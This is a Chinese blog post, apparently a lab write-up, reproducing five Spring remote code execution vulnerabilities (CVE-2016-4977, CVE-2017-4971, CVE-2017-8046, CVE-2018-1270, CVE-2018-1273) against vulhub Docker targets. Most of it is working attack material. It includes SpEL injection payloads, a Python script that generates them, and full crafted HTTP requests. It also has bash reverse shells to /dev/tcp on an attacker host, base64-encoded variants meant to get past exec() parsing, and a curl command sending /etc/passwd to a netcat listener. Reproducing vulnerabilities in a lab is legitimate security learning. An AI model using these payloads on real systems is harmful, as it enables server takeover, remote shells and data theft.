spring复现-不太详细

最新推荐文章于 2022-09-06 20:41:34 发布
最新推荐文章于 2022-09-06 20:41:34 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: java 文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43123409/article/details/121269129
版权

参考:https://cloud.tencent.com/developer/article/1841461?from=article.detail.1853055
在这里插入图片描述

Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)

Spring Security OAuth
是为 Spring 框架提供安全认证支持的一个模块。
在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),
攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
故是在需要知道 账号密码 的前提下才可以利用该漏洞。

docker-compose up -d

启动完成后,访问 http://192.168.33.130:8080/ 即可看到web页面。
在这里插入图片描述访问http://192.168.33.130:8080/oauth/authorize?response_type=${3*3}&client_id=acme&scope=openid&redirect_uri=http://test。用户名和密码是admin:admin

输入SpEL表达式 ${3*3} 成功执行并返回结果:表示漏洞存在
在这里插入图片描述

漏洞利用

  1. 写 poc1.py
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
	poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)

输入whoami生成spel格式的payload代码
在这里插入图片描述
将该payload代码加入进response_type参数部分,得到payload
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

http://192.168.33.130:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}&client_id=acme&scope=openid&redirect_uri=http://test

我自己生成payload总不能用啊啊啊啊
最后还是复制了原文的payload
才获取到信息
执行payload 返回了进程,表示代码执行了,但这没有回显,是无回显RCE
在这里插入图片描述可是这个whoami是谁呢,是网站权限?

在这里插入图片描述
4)无回显 结合nc得到回显内容

Kali Linux:nc -vlp 7766
靶机上:curl 192.168.33.129:7766 -d “$(cat /etc/passwd)”
在这里插入图片描述
在这里插入图片描述
看起来好像不太成功的样子
换个命令执行
成功把靶机whoami的执行结果shannon返回
在这里插入图片描述

在这里插入图片描述
5)payload二次变形

将下面的代码绕过exec()变形

bash -i >& /dev/tcp/192.168.33.129/7766 0>&1

通过网址:http://www.jackson-t.ca/runtime-exec-payloads.html
得到

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS83NzY2IDA+JjE=}|{base64,-d}|{bash,-i}

在这里插入图片描述我佛了,,,,生成了几个屏幕都装不下的payload
再放入上面的POC中,得到url
依然不成功
在这里插入图片描述

Spring Web Flow 远程代码执行漏洞(CVE-2017-4971)

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

Spring Web Flow 主要用于解决跨越多个请求的、用户与服务器之间的、有状态交互问题。当用户使用Spring Web Flow受影响的版本时,
如果配置了view-state,但是没有配置相应的binder,并且没有更改useSpringBeanBinding默认的false值,
当攻击者构造特殊的http请求时,就可以导致SpEL表达式注入,从而造成远程代码执行漏洞。

触发条件

  1. MvcViewFactoryCreator对象的useSpringBeanBinding参数需要设置为false(默认值)

  2. flow view对象中设置BinderConfiguration对象为空

在这里插入图片描述
然后访问id为1的酒店http://192.168.33.130:8080/hotels/1,
点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):

再点击确认“Confirm”:
此时抓包 拦截,抓到一个POST数据包,我们向其中添加一个字段(也就是反弹shell的POC)需要url 编码

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.33.129/21+0>%261")).start()=vulhub

在这里插入图片描述
在这里插入图片描述分析:Spring Web Flow 在 Model 的数据绑定上面,由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行
https://paper.seebug.org/322/

Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。
攻击者通过构造好的JSON数据来执行任意Java代码。

等待环境启动完成,然后访问http://your-ip:8080/即可看到json格式的返回值,说明这是一个Restful风格的API服务器。
在这里插入图片描述在这里插入图片描述

复现

访问http://your-ip:8080/customers/1,看到一个资源。我们使用PATCH请求来修改之:
在这里插入图片描述

抓包修改请求

PATCH /customers/1 HTTP/1.1
Host: 192.168.33.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: smile=1D1; hFyU_2132_ulastactivity=d258xq6rCRc3eY20NrjSAJewCIdQcKoRVjGF1P%2BGLHLUEZ0N2%2B%2Bv; hFyU_2132_nofavfid=1; JSESSIONID=87EB730C1C34779A0C951745922870F5
Upgrade-Insecure-Requests: 1
Content-Type: application/json-patch+json
Content-Length: 200

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

Content-Type: application/json-patch+json这句不要忘记加

path的值是SpEL表达式,发送上述数据包,将执行new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}
表示的命令是 touch /tmp/success。然后进入容器docker-compose exec spring bash看看:
在这里插入图片描述
新命令get,下次不用敲老长了
在这里插入图片描述

反弹shell

对 http://192.168.33.130:8080/customers/1 进行抓包,修改数据,执行的代码被编码为十进制位于new java.lang.String(new byte[]{xxxxxx})中

反弹shell命令:需绕过exec()编码 https://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/192.168.33.129/7733 0>&1
绕过 ↓
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS83NzMzIDA+JjE=}|{base64,-d}|{bash,-i}

转为十进制,编码后得到:

python3
>>> ",".join(map(str, (map(ord,"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS83NzMzIDA+JjE=}|{base64,-d}|{bash,-i}"))))

98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,77,122,76,106,69,121,79,83,56,51,78,122,77,122,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

在这里插入图片描述抓包 http://192.168.33.130:8080/customers/1 修改,构成数据包:

PATCH /customers/1 HTTP/1.1
Host: 192.168.33.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: smile=1D1; hFyU_2132_ulastactivity=d258xq6rCRc3eY20NrjSAJewCIdQcKoRVjGF1P%2BGLHLUEZ0N2%2B%2Bv; hFyU_2132_nofavfid=1
Upgrade-Insecure-Requests: 1
Content-Type: application/json-patch+json
If-Modified-Since: Thu, 11 Nov 2021 09:40:07 GMT
If-None-Match: "0"
Content-Length: 490

[
    { "op": "replace", 
      "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,77,122,76,106,69,121,79,83,56,51,78,122,77,122,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname",
      "value": "vulhub" 
    }
]

攻击机 监听:
在这里插入图片描述
发包 ~~~
在这里插入图片描述
在这里插入图片描述
漏洞分析

https://blog.spoock.com/2018/05/22/cve-2017-8046/

Spring Messaging 远程命令执行漏洞(CVE-2018-1270)

spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,

在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析(权限太大),造成命令执行漏洞。

spring messaging是基于sockjs(可以理解为一个通信协议),而sockjs适配多种浏览器:
现代浏览器中使用websocket通信,老式浏览器中使用ajax通信。

连接后端服务器的流程,可以理解为:

  1. 用STOMP协议将数据组合成一个文本流
  2. 用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信

所以我们可以使用http来复现漏洞,称之为“降维打击”。

漏洞利用

1)访问网址http://192.168.33.130:8080/gs-guide-websocket
在这里插入图片描述
2)修改payload,反弹shell

bash -i >& /dev/tcp/192.168.33.129/7733 0>&1
java.lang.Runtime.exec()编码后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS83NzMzIDA+JjE=}|{base64,-d}|{bash,-i}

编写 exploit.py
在这里插入图片描述

执行命令(需要用python3.6执行)(我这里也不是3.6,运行也成功监听到了)

python3 exploit.py

在这里插入图片描述漏洞原理
https://paper.seebug.org/562/

Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架 包含Commons、Gemfire、JPA、JDBC、MongoDB等模块。
此漏洞产生于Spring Data Commons组件是Spring Data下所有子项目共享的基础框架,适合各个子项目使用,支持跨数据库持久化。
Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令,直接获取服务器控制权限。
在这里插入图片描述1)访问http://192.168.112.141:8080/users,提交注册信息,抓包

2)修改包数据,尝试获取权限

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.33.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Origin: http://192.168.33.130:8080
Connection: close
Referer: http://192.168.33.130:8080/users
Cookie: smile=1D1; hFyU_2132_ulastactivity=d258xq6rCRc3eY20NrjSAJewCIdQcKoRVjGF1P%2BGLHLUEZ0N2%2B%2Bv; hFyU_2132_nofavfid=1
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=qwe&password=123456&repeatedPassword=123456

成功创建了success文件
在这里插入图片描述
漏洞原理

http://blog.nsfocus.net/cve-2018-1273-analysis/

鲨鱼饿死了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
进入和退出 conda base 环境
fangweijiex的博客
11-25 4940
进入 conda base 环境 conda activate basebash 退出 conda base 环境 conda deactivate
Linux下反弹shell
yy
04-21 4078
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
cmd echo写入shell_学习笔记-命令执行及花式bypass写shell
weixin_30801745的博客
01-26 1627
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
linux 命令 base,Linux操作系统base64命令操作案例,并解决-bash: !: event not found的问题...
weixin_35451402的博客
04-29 559
最近在编写自动化shell脚本,为实现简易的用户/密码/数据加密,防止直接的明文显示,使用base64编码算法进行数据转化**短字符串转码/解码测试**正常转码(经测试,加单引号、双引号或者不加引号的结果):```bash[root@db5 ~]# echo 123456 | base64MTIzNDU2Cg==[root@db5 ~]# echo '123456' | base64MTIzNDU...
Linux的终端Base; sh和bash的区别; /etc/profile和~/.bashrc等的执行顺序
baidu_19552787的博客
03-11 1445
一、 /etc/profile和~/.bashrc等的执行顺序;以及/etc/profile和/etc/bashrc的区别 ($HOME 等于 ~) (1)~/.bashrc 就是当前home目录下属组的根目录下的bashrc文件夹 (2)source命令的作用就是用来执行一个脚本。 在sudo vi profile重新配置完 环境后, 同样 最后重新载入配置文件,需要执行source /etc/profile。 (3)输入显示绝对路径命令 which virtualenvwrapper.sh 显
CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-06 2772
Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。建议使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。近日,披露Spring Cloud Gateway存在一处远程代码执行漏洞(CVE-2022-22947)。
apache log4j vulfocus 复现
weixin_45498459的博客
05-12 339
环境配置 cenos7 搭建docker 拉去vulfocus靶场 kali 如果这不长时间卡顿 就是网络的问题 可以尝试终止命令重新下载。同学5g网真的块 docker pull vulfocus/vulfocus:latest 拉取docker环境 docker run -d -p 801:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.137.11 vulfocus/vulf...
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 7614
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell? 反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
命令执行&
poorleaves的博客
07-27 367
Linux命令 命令执行
[译] 在Web API 2 中实现带JSON的Patch请求
weixin_30556959的博客
11-29 164
原文链接:The Patch Verb in Web API 2 with JSON 我想在.NET4.6 Web API 2 项目中使用Patch更新一个大对象中的某个字断,这才意识到我以前都没有用过Patch。这是一次难得的学习机会。 我不知道在Web API 2中最好的实现方式是什么,所以我按照惯例,用google搜索"Patch Web API"。我得到的第一条结果是Michael McK...
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
最新发布
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
CVE-2020-5398:VE CVE-2020-5398-Spring MVC的RFD(反射文件下载)攻击
04-15
CVE-2020-5398-Spring MVC的RFD(反射文件下载)攻击 在Spring Framework(版本低于5.2.3的5.2.x,版本5.1.13的5.1.x和版本5.0.16的5.0.x)中,应用程序在受到攻击时很容易受到反射文件下载(RFD)攻击在响应中设置...
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
狂神说Spring5最全笔记
01-13
根据狂神说狂神说Spring5视频复现的一摸一样的笔记
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值